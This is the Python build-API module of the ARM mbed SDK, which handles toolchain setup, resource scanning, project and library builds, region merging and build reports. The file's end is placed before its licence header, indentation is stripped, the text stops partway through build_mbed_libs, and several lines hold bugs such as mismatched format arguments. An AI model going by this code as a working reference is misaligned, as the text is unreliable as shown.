for dlistelem in dlist:
# Get 'memory_usage' record and build table with
# statistics
record = dlist[dlistelem]
if 'memory_usage' in record and record['memory_usage']:
# Note that summary should be in the last record of
# 'memory_usage' section. This is why we are
# grabbing last "[-1]" record.
row = [
record['description'],
record['target_name'],
record['toolchain_name'],
record['memory_usage'][-1]['summary'][
'static_ram'],
record['memory_usage'][-1]['summary'][
'total_flash'],
]
table.add_row(row)
result = "Memory map breakdown for built projects (values in Bytes):\n"
result += table.get_string(sortby='name')
return result
def write_build_report(build_report, template_filename, filename):
"""Write a build report to disk using a template file
Positional arguments:
build_report - a report generated by the build system
template_filename - a file that contains the template for the style of build
report
filename - the location on disk to write the file to
"""
build_report_failing = []
build_report_passing = []
for report in build_report:
if len(report["failing"]) > 0:
build_report_failing.append(report)
else:
build_report_passing.append(report)
env = Environment(extensions=['jinja2.ext.with_'])
env.loader = FileSystemLoader('ci_templates')
template = env.get_template(template_filename)
with open(filename, 'w+') as placeholder:
placeholder.write(template.render(
failing_builds=build_report_failing,
passing_builds=build_report_passing))
def merge_build_data(filename, toolchain_report, app_type):
path_to_file = dirname(abspath(filename))
try:
build_data = load(open(filename))
except (IOError, ValueError):
build_data = {'builds': []}
for tgt in toolchain_report.values():
for tc in tgt.values():
for project in tc.values():
for build in project:
try:
build[0]['elf'] = relpath(build[0]['elf'], path_to_file)
build[0]['bin'] = relpath(build[0]['bin'], path_to_file)
except KeyError:
pass
if 'type' not in build[0]:
build[0]['type'] = app_type
build_data['builds'].append(build[0])
dump(build_data, open(filename, "wb"), indent=4, separators=(',', ': '))
| 38.458333
| 101
| 0.635676
|
"""
mbed SDK
Copyright (c) 2011-2016 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import tempfile
import datetime
import uuid
from types import ListType
from shutil import rmtree
from os.path import join, exists, dirname, basename, abspath, normpath, splitext
from os.path import relpath
from os import linesep, remove, makedirs
from time import time
from intelhex import IntelHex
from json import load, dump
from tools.utils import mkdir, run_cmd, run_cmd_ext, NotSupportedException,\
ToolException, InvalidReleaseTargetException, intelhex_offset
from tools.paths import MBED_CMSIS_PATH, MBED_TARGETS_PATH, MBED_LIBRARIES,\
MBED_HEADER, MBED_DRIVERS, MBED_PLATFORM, MBED_HAL, MBED_CONFIG_FILE,\
MBED_LIBRARIES_DRIVERS, MBED_LIBRARIES_PLATFORM, MBED_LIBRARIES_HAL,\
BUILD_DIR
from tools.targets import TARGET_NAMES, TARGET_MAP
from tools.libraries import Library
from tools.toolchains import TOOLCHAIN_CLASSES
from jinja2 import FileSystemLoader
from jinja2.environment import Environment
from tools.config import Config
RELEASE_VERSIONS = ['2', '5']
def prep_report(report, target_name, toolchain_name, id_name):
"""Setup report keys
Positional arguments:
report - the report to fill
target_name - the target being used
toolchain_name - the toolchain being used
id_name - the name of the executable or library being built
"""
if not target_name in report:
report[target_name] = {}
if not toolchain_name in report[target_name]:
report[target_name][toolchain_name] = {}
if not id_name in report[target_name][toolchain_name]:
report[target_name][toolchain_name][id_name] = []
def prep_properties(properties, target_name, toolchain_name, vendor_label):
"""Setup test properties
Positional arguments:
properties - the dict to fill
target_name - the target the test is targeting
toolchain_name - the toolchain that will compile the test
vendor_label - the vendor
"""
if not target_name in properties:
properties[target_name] = {}
if not toolchain_name in properties[target_name]:
properties[target_name][toolchain_name] = {}
properties[target_name][toolchain_name]["target"] = target_name
properties[target_name][toolchain_name]["vendor"] = vendor_label
properties[target_name][toolchain_name]["toolchain"] = toolchain_name
def create_result(target_name, toolchain_name, id_name, description):
"""Create a result dictionary
Positional arguments:
target_name - the target being built for
toolchain_name - the toolchain doing the building
id_name - the name of the executable or library being built
description - a human readable description of what's going on
"""
cur_result = {}
cur_result["target_name"] = target_name
cur_result["toolchain_name"] = toolchain_name
cur_result["id"] = id_name
cur_result["description"] = description
cur_result["elapsed_time"] = 0
cur_result["output"] = ""
return cur_result
def add_result_to_report(report, result):
"""Add a single result to a report dictionary
Positional arguments:
report - the report to append to
result - the result to append
"""
result["date"] = datetime.datetime.utcnow().isoformat()
result["uuid"] = str(uuid.uuid1())
target = result["target_name"]
toolchain = result["toolchain_name"]
id_name = result['id']
result_wrap = {0: result}
report[target][toolchain][id_name].append(result_wrap)
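# A minimal sketch of how prep_report(), create_result() and
# add_result_to_report() fit together; the target, toolchain and id values are
# illustrative only. The resulting nesting is
# report[target][toolchain][id] -> list of {0: result} wrappers.
def _example_report_roundtrip():
    report = {}
    prep_report(report, "K64F", "GCC_ARM", "EXAMPLE")
    result = create_result("K64F", "GCC_ARM", "EXAMPLE", "illustrative result")
    result["result"] = "OK"
    add_result_to_report(report, result)
    return report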
def get_config(src_paths, target, toolchain_name):
"""Get the configuration object for a target-toolchain combination
Positional arguments:
src_paths - paths to scan for the configuration files
target - the device we are building for
toolchain_name - the string that identifies the build tools
"""
# Convert src_paths to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Pass all params to the unified prepare_resources()
toolchain = prepare_toolchain(src_paths, None, target, toolchain_name)
# Scan src_path for config files
resources = toolchain.scan_resources(src_paths[0])
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path))
# Update configuration files until added features creates no changes
prev_features = set()
while True:
# Update the configuration with any .json files found while scanning
toolchain.config.add_config_files(resources.json_files)
# Add features while we find new ones
features = set(toolchain.config.get_features())
if features == prev_features:
break
for feature in features:
if feature in resources.features:
resources += resources.features[feature]
prev_features = features
toolchain.config.validate_config()
if toolchain.config.has_regions:
_ = list(toolchain.config.regions)
cfg, macros = toolchain.config.get_config_data()
features = toolchain.config.get_features()
return cfg, macros, features
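# A minimal sketch of querying configuration data with get_config(); the source
# path and target name are placeholders that a real invocation would supply.
def _example_get_config(src_path="source", target_name="K64F"):
    cfg, macros, features = get_config([src_path], target_name, "GCC_ARM")
    return cfg, macros, features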
def is_official_target(target_name, version):
""" Returns True, None if a target is part of the official release for the
given version. Return False, 'reason' if a target is not part of the
official release for the given version.
Positional arguments:
target_name - Name of the target (ex. 'K64F')
version - The release version string. Should be a string contained within
RELEASE_VERSIONS
"""
result = True
reason = None
target = TARGET_MAP[target_name]
if hasattr(target, 'release_versions') \
and version in target.release_versions:
if version == '2':
# For version 2, either ARM or uARM toolchain support is required
required_toolchains = set(['ARM', 'uARM'])
if not len(required_toolchains.intersection(
set(target.supported_toolchains))) > 0:
result = False
reason = ("Target '%s' must support " % target.name) + \
("one of the folowing toolchains to be included in the") + \
((" mbed 2.0 official release: %s" + linesep) %
", ".join(required_toolchains)) + \
("Currently it is only configured to support the ") + \
("following toolchains: %s" %
", ".join(target.supported_toolchains))
elif version == '5':
# For version 5, ARM, GCC_ARM, and IAR toolchain support is required
required_toolchains = set(['ARM', 'GCC_ARM', 'IAR'])
required_toolchains_sorted = list(required_toolchains)
required_toolchains_sorted.sort()
supported_toolchains = set(target.supported_toolchains)
supported_toolchains_sorted = list(supported_toolchains)
supported_toolchains_sorted.sort()
if not required_toolchains.issubset(supported_toolchains):
result = False
reason = ("Target '%s' must support " % target.name) + \
("ALL of the folowing toolchains to be included in the") + \
((" mbed OS 5.0 official release: %s" + linesep) %
", ".join(required_toolchains_sorted)) + \
("Currently it is only configured to support the ") + \
("following toolchains: %s" %
", ".join(supported_toolchains_sorted))
elif not target.default_lib == 'std':
result = False
reason = ("Target '%s' must set the " % target.name) + \
("'default_lib' to 'std' to be included in the ") + \
("mbed OS 5.0 official release." + linesep) + \
("Currently it is set to '%s'" % target.default_lib)
else:
result = False
reason = ("Target '%s' has set an invalid release version of '%s'" %
version) + \
("Please choose from the following release versions: %s" %
', '.join(RELEASE_VERSIONS))
else:
result = False
if not hasattr(target, 'release_versions'):
reason = "Target '%s' " % target.name
reason += "does not have the 'release_versions' key set"
elif not version in target.release_versions:
reason = "Target '%s' does not contain the version '%s' " % \
(target.name, version)
reason += "in its 'release_versions' key"
return result, reason
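# A short sketch of interpreting the (result, reason) pair returned above;
# 'K64F' is the example target name from the docstring and may not exist in
# every checkout, so the call is wrapped in a helper instead of running on import.
def _example_check_official(target_name="K64F", version="5"):
    official, reason = is_official_target(target_name, version)
    return "official" if official else reason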
def transform_release_toolchains(toolchains, version):
""" Given a list of toolchains and a release version, return a list of
only the supported toolchains for that release
Positional arguments:
toolchains - The list of toolchains
version - The release version string. Should be a string contained within
RELEASE_VERSIONS
"""
if version == '5':
return ['ARM', 'GCC_ARM', 'IAR']
else:
return toolchains
def get_mbed_official_release(version):
""" Given a release version string, return a tuple that contains a target
and the supported toolchains for that release.
Ex. Given '2', return (('LPC1768', ('ARM', 'GCC_ARM')),
('K64F', ('ARM', 'GCC_ARM')), ...)
Positional arguments:
version - The version string. Should be a string contained within
RELEASE_VERSIONS
"""
mbed_official_release = (
tuple(
tuple(
[
TARGET_MAP[target].name,
tuple(transform_release_toolchains(
TARGET_MAP[target].supported_toolchains, version))
]
) for target in TARGET_NAMES \
if (hasattr(TARGET_MAP[target], 'release_versions')
and version in TARGET_MAP[target].release_versions)
)
)
for target in mbed_official_release:
is_official, reason = is_official_target(target[0], version)
if not is_official:
raise InvalidReleaseTargetException(reason)
return mbed_official_release
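# A sketch of consuming the (target, toolchains) tuples documented above,
# assuming the release data for the requested version is well formed.
def _example_describe_release(version="5"):
    lines = []
    for target_name, toolchains in get_mbed_official_release(version):
        lines.append("%s: %s" % (target_name, ", ".join(toolchains)))
    return "\n".join(lines)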
def add_regions_to_profile(profile, config, toolchain_class):
"""Add regions to the build profile, if there are any.
Positional Arguments:
profile - the profile to update
config - the configuration object that owns the region
toolchain_class - the class of the toolchain being used
"""
if not profile:
return
regions = list(config.regions)
for region in regions:
for define in [(region.name.upper() + "_ADDR", region.start),
(region.name.upper() + "_SIZE", region.size)]:
profile["common"].append("-D%s=0x%x" % define)
active_region = [r for r in regions if r.active][0]
for define in [("MBED_APP_START", active_region.start),
("MBED_APP_SIZE", active_region.size)]:
profile["ld"].append(toolchain_class.make_ld_define(*define))
print("Using regions in this build:")
for region in regions:
print(" Region %s size 0x%x, offset 0x%x"
% (region.name, region.size, region.start))
def prepare_toolchain(src_paths, build_dir, target, toolchain_name,
macros=None, clean=False, jobs=1,
notify=None, silent=False, verbose=False,
extra_verbose=False, config=None,
app_config=None, build_profile=None):
""" Prepares resource related objects - toolchain, target, config
Positional arguments:
src_paths - the paths to source directories
target - ['LPC1768', 'LPC11U24', etc.]
toolchain_name - ['ARM', 'uARM', 'GCC_ARM', 'GCC_CR']
Keyword arguments:
macros - additional macros
clean - Rebuild everything if True
jobs - how many compilers we can run at once
notify - Notify function for logs
silent - suppress printing of progress indicators
verbose - Write the actual tools command lines used if True
extra_verbose - even more output!
config - a Config object to use instead of creating one
app_config - location of a chosen mbed_app.json file
build_profile - a list of mergeable build profiles
"""
# We need to remove all paths which are repeated to avoid
# multiple compilations and linking with the same objects
src_paths = [src_paths[0]] + list(set(src_paths[1:]))
# If the configuration object was not yet created, create it now
config = config or Config(target, src_paths, app_config=app_config)
target = config.target
try:
cur_tc = TOOLCHAIN_CLASSES[toolchain_name]
except KeyError:
raise KeyError("Toolchain %s not supported" % toolchain_name)
profile = {'c': [], 'cxx': [], 'common': [], 'asm': [], 'ld': []}
for contents in build_profile or []:
for key in profile:
profile[key].extend(contents[toolchain_name][key])
if config.has_regions:
add_regions_to_profile(profile, config, cur_tc)
toolchain = cur_tc(target, notify, macros, silent, build_dir=build_dir,
extra_verbose=extra_verbose, build_profile=profile)
toolchain.config = config
toolchain.jobs = jobs
toolchain.build_all = clean
toolchain.VERBOSE = verbose
return toolchain
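# A minimal sketch of creating a toolchain object with prepare_toolchain(); the
# source path, build directory, target and toolchain name are placeholders for
# whatever a real build would pass in.
def _example_prepare_toolchain(src_path="source", build_dir="BUILD"):
    return prepare_toolchain([src_path], build_dir, "K64F", "GCC_ARM",
                             jobs=1, verbose=False)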
def merge_region_list(region_list, destination, padding=b'\xFF'):
"""Merege the region_list into a single image
Positional Arguments:
region_list - list of regions, which should contain filenames
destination - file name to write all regions to
padding - bytes to fill gaps with
"""
merged = IntelHex()
print("Merging Regions:")
for region in region_list:
if region.active and not region.filename:
raise ToolException("Active region has no contents: No file found.")
if region.filename:
print(" Filling region %s with %s" % (region.name, region.filename))
part = intelhex_offset(region.filename, offset=region.start)
part_size = (part.maxaddr() - part.minaddr()) + 1
if part_size > region.size:
raise ToolException("Contents of region %s does not fit"
% region.name)
merged.merge(part)
pad_size = region.size - part_size
if pad_size > 0 and region != region_list[-1]:
print(" Padding region %s with 0x%x bytes" % (region.name, pad_size))
merged.puts(merged.maxaddr() + 1, padding * pad_size)
if not exists(dirname(destination)):
makedirs(dirname(destination))
print("Space used after regions merged: 0x%x" %
(merged.maxaddr() - merged.minaddr() + 1))
with open(destination, "wb+") as output:
merged.tofile(output, format='bin')
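# A sketch of how merge_region_list() is typically driven from a configuration
# that defines regions; the destination file name is a placeholder and the call
# stays inside a helper because it writes to disk.
def _example_merge_regions(config, destination="combined.bin"):
    region_list = list(config.regions)
    merge_region_list(region_list, destination)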
def scan_resources(src_paths, toolchain, dependencies_paths=None,
inc_dirs=None, base_path=None, collect_ignores=False):
""" Scan resources using initialized toolcain
Positional arguments
src_paths - the paths to source directories
toolchain - valid toolchain object
dependencies_paths - dependency paths that we should scan for include dirs
inc_dirs - additional include directories which should be added to
the scanner resources
"""
# Scan src_path
resources = toolchain.scan_resources(src_paths[0], base_path=base_path,
collect_ignores=collect_ignores)
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path, base_path=base_path,
collect_ignores=collect_ignores))
# Scan dependency paths for include dirs
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
resources.inc_dirs.extend(lib_resources.inc_dirs)
# Add additional include directories if passed
if inc_dirs:
if type(inc_dirs) == ListType:
resources.inc_dirs.extend(inc_dirs)
else:
resources.inc_dirs.append(inc_dirs)
# Load resources into the config system which might expand/modify resources
# based on config data
resources = toolchain.config.load_resources(resources)
# Set the toolchain's configuration data
toolchain.set_config_data(toolchain.config.get_config_data())
if (hasattr(toolchain.target, "release_versions") and
"5" not in toolchain.target.release_versions and
"rtos" in toolchain.config.lib_config_data):
if "Cortex-A" in toolchain.target.core:
raise NotSupportedException(
("%s Will be supported in mbed OS 5.6. "
"To use the %s, please checkout the mbed OS 5.4 release branch. "
"See https://developer.mbed.org/platforms/Renesas-GR-PEACH/#important-notice "
"for more information") % (toolchain.target.name, toolchain.target.name))
else:
raise NotSupportedException("Target does not support mbed OS 5")
return resources
def build_project(src_paths, build_path, target, toolchain_name,
libraries_paths=None, linker_script=None,
clean=False, notify=None, verbose=False, name=None,
macros=None, inc_dirs=None, jobs=1, silent=False,
report=None, properties=None, project_id=None,
project_description=None, extra_verbose=False, config=None,
app_config=None, build_profile=None, stats_depth=None):
""" Build a project. A project may be a test or a user program.
Positional arguments:
src_paths - a path or list of paths that contain all files needed to build
the project
build_path - the directory where all of the object files will be placed
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
libraries_paths - The location of libraries to include when linking
linker_script - the file that drives the linker to do its job
clean - Rebuild everything if True
notify - Notify function for logs
verbose - Write the actual tools command lines used if True
name - the name of the project
macros - additional macros
inc_dirs - additional directories where include files may be found
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - a dict to fill with per-target/toolchain build properties (see prep_properties)
project_id - the name put in the report
project_description - the human-readable version of what this thing does
extra_verbose - even more output!
config - a Config object to use instead of creating one
app_config - location of a chosen mbed_app.json file
build_profile - a dict of flags that will be passed to the compiler
stats_depth - depth level for memap to display file/dirs
"""
# Convert src_path to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Extend src_paths with libraries_paths
if libraries_paths is not None:
src_paths.extend(libraries_paths)
inc_dirs.extend(map(dirname, libraries_paths))
if clean and exists(build_path):
rmtree(build_path)
mkdir(build_path)
toolchain = prepare_toolchain(
src_paths, build_path, target, toolchain_name, macros=macros,
clean=clean, jobs=jobs, notify=notify, silent=silent, verbose=verbose,
extra_verbose=extra_verbose, config=config, app_config=app_config,
build_profile=build_profile)
# The first path will give the name to the library
name = (name or toolchain.config.name or
basename(normpath(abspath(src_paths[0]))))
toolchain.info("Building project %s (%s, %s)" %
(name, toolchain.target.name, toolchain_name))
# Initialize reporting
if report != None:
start = time()
# If project_id is specified, use that over the default name
id_name = project_id.upper() if project_id else name.upper()
description = project_description if project_description else name
vendor_label = toolchain.target.extra_labels[0]
prep_report(report, toolchain.target.name, toolchain_name, id_name)
cur_result = create_result(toolchain.target.name, toolchain_name,
id_name, description)
if properties != None:
prep_properties(properties, toolchain.target.name, toolchain_name,
vendor_label)
try:
# Call unified scan_resources
resources = scan_resources(src_paths, toolchain, inc_dirs=inc_dirs)
# Change linker script if specified
if linker_script is not None:
resources.linker_script = linker_script
# Compile Sources
objects = toolchain.compile_sources(resources, resources.inc_dirs)
resources.objects.extend(objects)
# Link Program
if toolchain.config.has_regions:
res, _ = toolchain.link_program(resources, build_path, name + "_application")
region_list = list(toolchain.config.regions)
region_list = [r._replace(filename=res) if r.active else r
for r in region_list]
res = join(build_path, name) + ".bin"
merge_region_list(region_list, res)
else:
res, _ = toolchain.link_program(resources, build_path, name)
memap_instance = getattr(toolchain, 'memap_instance', None)
memap_table = ''
if memap_instance:
# Write output to stdout in text (pretty table) format
memap_table = memap_instance.generate_output('table', stats_depth)
if not silent:
print(memap_table)
# Write output to file in JSON format
map_out = join(build_path, name + "_map.json")
memap_instance.generate_output('json', stats_depth, map_out)
# Write output to file in CSV format for the CI
map_csv = join(build_path, name + "_map.csv")
memap_instance.generate_output('csv-ci', stats_depth, map_csv)
resources.detect_duplicates(toolchain)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output() + memap_table
cur_result["result"] = "OK"
cur_result["memory_usage"] = memap_instance.mem_report
cur_result["bin"] = res
cur_result["elf"] = splitext(res)[0] + ".elf"
cur_result.update(toolchain.report)
add_result_to_report(report, cur_result)
return res
except Exception as exc:
if report != None:
end = time()
if isinstance(exc, NotSupportedException):
cur_result["result"] = "NOT_SUPPORTED"
else:
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
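# A minimal sketch of a whole-project build using build_project(); every path
# and name here is a placeholder, so the call sits in a helper and bails out
# when the assumed source directory is missing.
def _example_build_project(src_path="source", build_path="BUILD/K64F/GCC_ARM"):
    if not exists(src_path):
        return None
    return build_project([src_path], build_path, "K64F", "GCC_ARM",
                         name="example", jobs=1)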
def build_library(src_paths, build_path, target, toolchain_name,
dependencies_paths=None, name=None, clean=False,
archive=True, notify=None, verbose=False, macros=None,
inc_dirs=None, jobs=1, silent=False, report=None,
properties=None, extra_verbose=False, project_id=None,
remove_config_header_file=False, app_config=None,
build_profile=None):
""" Build a library
Positional arguments:
src_paths - a path or list of paths that contain all files needed to build
the library
build_path - the directory where all of the object files will be placed
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
dependencies_paths - The location of libraries to include when linking
name - the name of the library
clean - Rebuild everything if True
archive - whether the library will create an archive file
notify - Notify function for logs
verbose - Write the actual tools command lines used if True
macros - additional macros
inc_dirs - additional directories where include files may be found
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - a dict to fill with per-target/toolchain build properties (see prep_properties)
extra_verbose - even more output!
project_id - the name that goes in the report
remove_config_header_file - delete config header file when done building
app_config - location of a chosen mbed_app.json file
build_profile - a dict of flags that will be passed to the compiler
"""
# Convert src_path to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Build path
if archive:
# Use temp path when building archive
tmp_path = join(build_path, '.temp')
mkdir(tmp_path)
else:
tmp_path = build_path
# Clean the build directory
if clean and exists(tmp_path):
rmtree(tmp_path)
mkdir(tmp_path)
# Pass all params to the unified prepare_toolchain()
toolchain = prepare_toolchain(
src_paths, build_path, target, toolchain_name, macros=macros,
clean=clean, jobs=jobs, notify=notify, silent=silent,
verbose=verbose, extra_verbose=extra_verbose, app_config=app_config,
build_profile=build_profile)
# The first path will give the name to the library
if name is None:
name = basename(normpath(abspath(src_paths[0])))
toolchain.info("Building library %s (%s, %s)" %
(name, toolchain.target.name, toolchain_name))
# Initialize reporting
if report != None:
start = time()
# If project_id is specified, use that over the default name
id_name = project_id.upper() if project_id else name.upper()
description = name
vendor_label = toolchain.target.extra_labels[0]
prep_report(report, toolchain.target.name, toolchain_name, id_name)
cur_result = create_result(toolchain.target.name, toolchain_name,
id_name, description)
cur_result['type'] = 'library'
if properties != None:
prep_properties(properties, toolchain.target.name, toolchain_name,
vendor_label)
for src_path in src_paths:
if not exists(src_path):
error_msg = "The library source folder does not exist: %s", src_path
if report != None:
cur_result["output"] = error_msg
cur_result["result"] = "FAIL"
add_result_to_report(report, cur_result)
raise Exception(error_msg)
try:
# Call unified scan_resources
resources = scan_resources(src_paths, toolchain,
dependencies_paths=dependencies_paths,
inc_dirs=inc_dirs)
# Copy headers, objects and static libraries - all files needed for
# static lib
toolchain.copy_files(resources.headers, build_path, resources=resources)
toolchain.copy_files(resources.objects, build_path, resources=resources)
toolchain.copy_files(resources.libraries, build_path,
resources=resources)
toolchain.copy_files(resources.json_files, build_path,
resources=resources)
if resources.linker_script:
toolchain.copy_files(resources.linker_script, build_path,
resources=resources)
if resources.hex_files:
toolchain.copy_files(resources.hex_files, build_path,
resources=resources)
# Compile Sources
objects = toolchain.compile_sources(resources, resources.inc_dirs)
resources.objects.extend(objects)
if archive:
toolchain.build_library(objects, build_path, name)
if remove_config_header_file:
config_header_path = toolchain.get_config_header()
if config_header_path:
remove(config_header_path)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception as exc:
if report != None:
end = time()
if isinstance(exc, ToolException):
cur_result["result"] = "FAIL"
elif isinstance(exc, NotSupportedException):
cur_result["result"] = "NOT_SUPPORTED"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
######################
### Legacy methods ###
######################
def mbed2_obj_path(target_name, toolchain_name):
real_tc_name = TOOLCHAIN_CLASSES[toolchain_name].__name__
return join("TARGET_" + target_name, "TOOLCHAIN_" + real_tc_name)
def build_lib(lib_id, target, toolchain_name, verbose=False,
clean=False, macros=None, notify=None, jobs=1, silent=False,
report=None, properties=None, extra_verbose=False,
build_profile=None):
""" Legacy method for building mbed libraries
Positional arguments:
lib_id - the library's unique identifier
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
clean - Rebuild everything if True
verbose - Write the actual tools command lines used if True
macros - additional macros
notify - Notify function for logs
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - a dict to fill with per-target/toolchain build properties (see prep_properties)
extra_verbose - even more output!
build_profile - a dict of flags that will be passed to the compiler
"""
lib = Library(lib_id)
if not lib.is_supported(target, toolchain_name):
print('Library "%s" is not yet supported on target %s with toolchain %s'
% (lib_id, target.name, toolchain_name))
return False
lib_macros = lib.macros if lib.macros else []
if macros:
macros.extend(lib_macros)
else:
macros = lib_macros
src_paths = lib.source_dir
build_path = lib.build_dir
dependencies_paths = lib.dependencies
inc_dirs = lib.inc_dirs
inc_dirs_ext = lib.inc_dirs_ext
if type(src_paths) != ListType:
src_paths = [src_paths]
name = basename(src_paths[0])
if report != None:
start = time()
id_name = name.upper()
description = name
vendor_label = target.extra_labels[0]
cur_result = None
prep_report(report, target.name, toolchain_name, id_name)
cur_result = create_result(target.name, toolchain_name, id_name,
description)
if properties != None:
prep_properties(properties, target.name, toolchain_name,
vendor_label)
for src_path in src_paths:
if not exists(src_path):
error_msg = "The library source folder does not exist: %s", src_path
if report != None:
cur_result["output"] = error_msg
cur_result["result"] = "FAIL"
add_result_to_report(report, cur_result)
raise Exception(error_msg)
try:
bin_path = join(build_path, mbed2_obj_path(target.name, toolchain_name))
mkdir(bin_path)
tmp_path = join(build_path, '.temp', mbed2_obj_path(target.name,
toolchain_name))
mkdir(tmp_path)
toolchain = prepare_toolchain(
src_paths, tmp_path, target, toolchain_name, macros=macros,
notify=notify, silent=silent, extra_verbose=extra_verbose,
build_profile=build_profile, jobs=jobs, clean=clean)
toolchain.info("Building library %s (%s, %s)" %
(name.upper(), target.name, toolchain_name))
config = toolchain.config
config.add_config_files([MBED_CONFIG_FILE])
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
if inc_dirs_ext is not None:
for inc_ext in inc_dirs_ext:
resources.append(toolchain.scan_resources(inc_ext))
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
dependencies_include_dir.extend(map(dirname, lib_resources.inc_dirs))
if inc_dirs:
dependencies_include_dir.extend(inc_dirs)
for res in resources:
config.load_resources(res)
toolchain.set_config_data(toolchain.config.get_config_data())
for resource in resources:
toolchain.copy_files(resource.headers, build_path,
resources=resource)
dependencies_include_dir.extend(
toolchain.scan_resources(build_path).inc_dirs)
objects = []
for resource in resources:
objects.extend(toolchain.compile_sources(resource, dependencies_include_dir))
needed_update = toolchain.build_library(objects, bin_path, name)
if report != None and needed_update:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception:
if report != None:
end = time()
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
raise
def build_mbed_libs(target, toolchain_name, verbose=False,
clean=False, macros=None, notify=None, jobs=1, silent=False,
report=None, properties=None, extra_verbose=False,
build_profile=None):
""" Function returns True is library was built and false if building was
skipped
Positional arguments:
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
verbose - Write the actual tools command lines used if True
clean - Rebuild everything if True
macros - additional macros
notify - Notify function for logs
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - a dict to fill with per-target/toolchain build properties (see prep_properties)
extra_verbose - even more output!
build_profile - a dict of flags that will be passed to the compiler
"""
if report != None:
start = time()
id_name = "MBED"
description = "mbed SDK"
vendor_label = target.extra_labels[0]
cur_result = None
prep_report(report, target.name, toolchain_name, id_name)
cur_result = create_result(target.name, toolchain_name, id_name,
description)
if properties != None:
prep_properties(properties, target.name, toolchain_name,
vendor_label)
if toolchain_name not in target.supported_toolchains:
supported_toolchains_text = ", ".join(target.supported_toolchains)
print('%s target is not yet supported by toolchain %s' %
(target.name, toolchain_name))
print('%s target supports %s toolchain%s' %
(target.name, supported_toolchains_text, 's'
if len(target.supported_toolchains) > 1 else ''))
if report != None:
cur_result["result"] = "SKIP"
add_result_to_report(report, cur_result)
return False
try:
build_target = join(MBED_LIBRARIES, "TARGET_" + target.name)
build_toolchain = join(MBED_LIBRARIES, mbed2_obj_path(target.name, toolchain_name))
mkdir(build_toolchain)
tmp_path = join(MBED_LIBRARIES, '.temp', mbed2_obj_path(target.name, toolchain_name))
mkdir(tmp_path)
toolchain = prepare_toolchain(
[""], tmp_path, target, toolchain_name, macros=macros,verbose=verbose,
notify=notify, silent=silent, extra_verbose=extra_verbose,
build_profile=build_profile, jobs=jobs, clean=clean)
config = toolchain.config
config.add_config_files([MBED_CONFIG_FILE])
toolchain.set_config_data(toolchain.config.get_config_data())
toolchain.info("Building library %s (%s, %s)" %
('CMSIS', target.name, toolchain_name))
cmsis_src = MBED_CMSIS_PATH
resources = toolchain.scan_resources(cmsis_src)
toolchain.copy_files(resources.headers, build_target)
toolchain.copy_files(resources.linker_script, build_toolchain)
toolchain.copy_files(resources.bin_files, build_toolchain)
objects = toolchain.compile_sources(resources, tmp_path)
toolchain.copy_files(objects, build_toolchain)
toolchain.info("Building library %s (%s, %s)" %
('MBED', target.name, toolchain_name))
toolchain.copy_files([MBED_HEADER], MBED_LIBRARIES)
library_incdirs = [dirname(MBED_LIBRARIES), MBED_LIBRARIES]
for dir, dest in [(MBED_DRIVERS, MBED_LIBRARIES_DRIVERS),
(MBED_PLATFORM, MBED_LIBRARIES_PLATFORM),
(MBED_HAL, MBED_LIBRARIES_HAL)]:
resources = toolchain.scan_resources(dir)
toolchain.copy_files(resources.headers, dest)
library_incdirs.append(dest)
hal_src = MBED_TARGETS_PATH
hal_implementation = toolchain.scan_resources(hal_src)
toolchain.copy_files(hal_implementation.headers +
hal_implementation.hex_files +
hal_implementation.libraries +
[MBED_CONFIG_FILE],
build_target, resources=hal_implementation)
toolchain.copy_files(hal_implementation.linker_script, build_toolchain)
toolchain.copy_files(hal_implementation.bin_files, build_toolchain)
incdirs = toolchain.scan_resources(build_target).inc_dirs
objects = toolchain.compile_sources(hal_implementation,
library_incdirs + incdirs)
toolchain.copy_files(objects, build_toolchain)
mbed_resources = None
for dir in [MBED_DRIVERS, MBED_PLATFORM, MBED_HAL]:
mbed_resources += toolchain.scan_resources(dir)
objects = toolchain.compile_sources(mbed_resources,
library_incdirs + incdirs)
